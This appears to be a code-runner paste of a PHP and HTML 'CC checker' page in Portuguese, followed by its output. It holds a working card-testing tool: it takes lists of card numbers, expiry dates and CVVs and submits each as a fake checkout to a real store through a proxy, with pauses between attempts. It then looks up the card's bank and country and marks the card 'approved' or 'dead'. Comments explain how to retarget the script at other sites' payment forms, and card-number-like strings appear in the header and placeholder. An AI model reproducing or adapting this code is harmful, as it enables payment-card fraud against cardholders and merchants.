fork download
  1. <html>5201105728455471|08|2021|126
  2. <head>
  3. <title>Queen Checker CC</title>
  4. <link href="http://d...content-available-to-author-only...b.io/Flat-UI/dist/css/vendor/bootstrap.min.css" rel="stylesheet">
  5. <link href="http://d...content-available-to-author-only...b.io/Flat-UI/dist/css/flat-ui.min.css" rel="stylesheet">
  6. <link href="http://d...content-available-to-author-only...b.io/Flat-UI/docs/assets/css/demo.css" rel="stylesheet">
  7. <link rel="stylesheet" href="https://m...content-available-to-author-only...n.com/bootstrap/3.3.5/css/bootstrap.min.css">
  8. <link rel="stylesheet" href="https://m...content-available-to-author-only...n.com/bootstrap/3.3.5/css/bootstrap-theme.min.css">
  9. <script src="https://m...content-available-to-author-only...n.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  10. <meta charset="UTF-8">
  11. </head>
  12. <style>
  13. body {
  14. background-color: #00001a;
  15. }
  16. </style>
  17. <body>
  18. <center>
  19. <div class="demo-headline">
  20. <h1 class="demo-logo">Testador De Infocc
  21. <small>Free Testador De Geradas Ou Full!</small>
  22. </h1>
  23. </div>
  24. <form name="frm-CardCheck" method="post">
  25. <div class="form-group has-success">
  26. <b>
  27. <textarea name="CARDLIS" cols="85" class="form-control" style="width:850px" rows="6" placeholder="4093081909142000|07|2021|836 - Delimitadores : | ; / "></textarea>
  28. </b>
  29. </div>
  30. <div class="form-group">
  31. <input name="proxp" placeholder="Proxy HTTPS:Porta" style="width:200px" class="form-control" type="text">
  32. </div>
  33. <input type="submit" class="btn btn-block btn-lg btn-info" value="CHECAR" style="width:350px">
  34. </form>
  35. <script>
  36. function scrollWindow()
  37. {
  38. window.scrollTo(100,500)
  39. }
  40. </script>
  41. <?php
  42. $_POST['proxp'];
  43. $proxie = $_POST['proxp'];
  44. if(isset($_POST['CARDLIS'])){
  45. $SetParamList = trim($_POST['CARDLIS']);
  46. $SetParamList = split("\n", $SetParamList);
  47. $SetParamCount = count($SetParamList);
  48. for($setParamUX = 0; $setParamUX < $SetParamCount; $setParamUX++) {
  49. $SetParamList = str_replace(" ", "", $SetParamList);
  50. $SetParamList = str_replace("\r", "", $SetParamList);
  51. $SetParamList = str_replace("\n", "", $SetParamList);
  52. list($card, $mes, $ano, $cvv, $resto) = split("[:|;/]", $SetParamList[$setParamUX]);
  53. sleep(8);
  54. $setParamFunction = CardCheck($card, $mes, $ano, $cvv);
  55. print $setParamFunction;
  56. }
  57. print "<br> <div style='width: 40%;' class='alert alert-info'>Foram testados <strong>{$SetParamCount}</strong> cartões!</div><script>scrollWindow()</script><audio autoplay><source src='https://i...content-available-to-author-only...d.io/kam/download' type='audio/mp3'></audio><title>Teste Finalizado</title>";
  58. }
  59. function CardCheck($card, $mes, $ano, $cvv) {
  60.  
  61. if(file_exists(getcwd().'CardCheck_logs.txt')) {
  62. unlink(getcwd().'CardCheck_logs.txt');
  63. }
  64. if(file_exists("cookie.txt")){
  65. unlink("cookie.txt");
  66. }
  67. switch (substr($card, 0, 1)) {
  68. case '4':
  69. $typeCard = 1;
  70. $typeName = "Visa";
  71. break;
  72. case '5':
  73. $typeCard = 2;
  74. $typeName = "MasterCard";
  75. break;
  76. case '3':
  77. $typeCard = 3;
  78. $typeName = "American Express";
  79. break;
  80. case '60':
  81. $typeCard = 60;
  82. $typeName = "Discover";
  83. break;
  84. }
  85. /*/
  86. switch ($mes) {
  87.   case '01':
  88.   $mes = '1';
  89.   break;
  90.   case '02':
  91.   $mes = '2';
  92.   break;
  93.   case '03':
  94.   $mes = '3';
  95.   break;
  96.   case '04':
  97.   $mes = '4';
  98.   break;
  99.   case '05':
  100.   $mes = '5';
  101.   break;
  102.   case '06':
  103.   $mes = '6';
  104.   break;
  105.   case '07':
  106.   $mes = '7';
  107.   break;
  108.   case '08':
  109.   $mes = '8';
  110.   break;
  111.   case '09':
  112.   $mes = '9';
  113.   break;
  114.   }
  115. /*/
  116. $ch = curl_init();
  117. curl_setopt($ch, CURLOPT_URL, "https://p...content-available-to-author-only...t.com/checkout"); // aqui voce poe a url que ele vai ser postado, n é a url do site é a url onde vai ser postado, o tamper data quando voce envia a doaçao ele ja te mostra o link no qual o site fez o post...
  118. curl_setopt($ch, CURLOPT_HEADER, 1);
  119. $User_Agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0';
  120. $request_headers = array();
  121. $request_headers[] = 'Host: pittman.foxycart.com';
  122. $request_headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0';
  123. $request_headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
  124. $request_headers[] = 'Referer: https://p...content-available-to-author-only...t.com/checkout';
  125. curl_setopt($ch, CURLOPT_PROXY, $proxie);
  126. curl_setopt($ch, CURLOPT_HTTPHEADER, $request_headers);
  127. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  128. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  129. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  130. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  131. curl_setopt($ch, CURLOPT_POST, 1);
  132. curl_setopt($ch, CURLOPT_POSTFIELDS, "fcsid=&email_dummy=&password_dummy=&ThisAction=checkout&customer_id=0&fcsid=459rrnpul1srsg0g57q42g5pm0&is_anonymous=1&anonymous_checkout_selected=0&email_is_found=0&customer_email=dsfgdg%40dlemail.ru&billing_first_name=pedro&billing_last_name=jose&billing_company=&billing_phone=&billing_tax_id=&billing_address1=limeiras&billing_address2=&billing_postal_code=19568&billing_city=sao+paulo&billing_region=AF&billing_country=US&fc_payment_method=plastic_new&cc_number=$card&cc_exp_month=$mes&cc_exp_year=$ano&cc_cvv2=$cvv"); // aqui é o post data, onde tiver o cartao voce muda pra $card , onde tiver o mes voce poe $mes, onde tiver o ano voce poe $ano, onde tiver o cvc, ou cvv coloque $cvv.
  133. $data = curl_exec($ch);
  134. if($data){
  135. $cc = substr($card,0,6);
  136. $curl_ch = curl_init();
  137. curl_setopt($curl_ch, CURLOPT_URL, "http://t...content-available-to-author-only...y.com/webtools/tool/othertool/bin/");
  138. curl_setopt($curl_ch, CURLOPT_RETURNTRANSFER, true);
  139. curl_setopt($curl_ch, CURLOPT_POST, TRUE);
  140. curl_setopt($curl_ch, CURLOPT_FOLLOWLOCATION, TRUE);
  141. curl_setopt($curl_ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0");
  142. curl_setopt($curl_ch, CURLOPT_POSTFIELDS, 'listcc='.$card.'&submit=CHECK+NOW');
  143. $dadosSite = curl_exec($curl_ch);
  144. $expl = explode('</td>', $dadosSite);
  145. $Banco = $expl[5];
  146. $Tipo = $expl[6];
  147. $Pais = $expl[7];
  148. $quatro = $expl[8];
  149. $sshdia = date('d/m/y');
  150. $sshhora = date('H:i');
  151. $sship = @getenv('REMOTE_ADDR');
  152. $sshrevers = @gethostbyaddr($ip);
  153. if($Tipo == ""){ $bandeira = "N/A"; }
  154. if($Banco == ""){ $type = "N/A"; }
  155. if($Pais == ""){ $credit = "N/A"; }
  156. //echo $data;
  157. if(stristr($data,'This transaction has been declined') !== false){
  158. echo "<div class='alert alert-danger' style='width: 90%;'><b style='color:gray'>La Firma Checker Die ✘ </b> | {$card} | {$mes} | {$ano} | {$cvv} |</b> #Queenchecker.com</div><script>scrollWindow()</script>";
  159. unset($curl_ch);
  160. }elseif(!stristr($data, 'This transaction has been declined') !== false){
  161. echo "<div class='alert alert-success' style='width: 90%;'><b style='color:gray'>#Aprovada </b> <b style='color:green'> | {$card} | {$mes} | {$ano} | {$cvv} | Informações ➜ {$Tipo} | {$Banco} | {$Pais} |</b> #Queenchecker.com</div><script>scrollWindow()</script><audio autoplay><source src='https://i...content-available-to-author-only...d.io/k8A/download' type='audio/mp3'></audio>";
  162. unset($curl_ch);
  163. }
  164. }
  165. }
  166. ?>
  167. </center>
  168. </body>
  169. </html>
Success #stdin #stdout 0.02s 26308KB
stdin
Standard input is empty
stdout
<html>5201105728455471|08|2021|126
<head>
<title>Queen Checker CC</title>
<link href="http://d...content-available-to-author-only...b.io/Flat-UI/dist/css/vendor/bootstrap.min.css" rel="stylesheet">
<link href="http://d...content-available-to-author-only...b.io/Flat-UI/dist/css/flat-ui.min.css" rel="stylesheet">
<link href="http://d...content-available-to-author-only...b.io/Flat-UI/docs/assets/css/demo.css" rel="stylesheet">
<link rel="stylesheet" href="https://m...content-available-to-author-only...n.com/bootstrap/3.3.5/css/bootstrap.min.css">  
<link rel="stylesheet" href="https://m...content-available-to-author-only...n.com/bootstrap/3.3.5/css/bootstrap-theme.min.css">
<script src="https://m...content-available-to-author-only...n.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>  
<meta charset="UTF-8">
</head>
<style>
body {
    background-color: #00001a;
}
</style>
<body>
<center>  
<div class="demo-headline">
<h1 class="demo-logo">Testador De Infocc
<small>Free Testador De Geradas Ou Full!</small>
</h1>
</div>
<form name="frm-CardCheck" method="post">
<div class="form-group has-success">
<b>
<textarea name="CARDLIS" cols="85" class="form-control" style="width:850px" rows="6" placeholder="4093081909142000|07|2021|836  - Delimitadores : | ; / "></textarea>
</b>
</div>
<div class="form-group">
<input name="proxp" placeholder="Proxy HTTPS:Porta" style="width:200px" class="form-control" type="text">
</div>
<input type="submit"  class="btn btn-block btn-lg btn-info" value="CHECAR" style="width:350px">
</form>
<script>
function scrollWindow()
  {
  window.scrollTo(100,500)
  }
</script>
</center>
</body>
</html>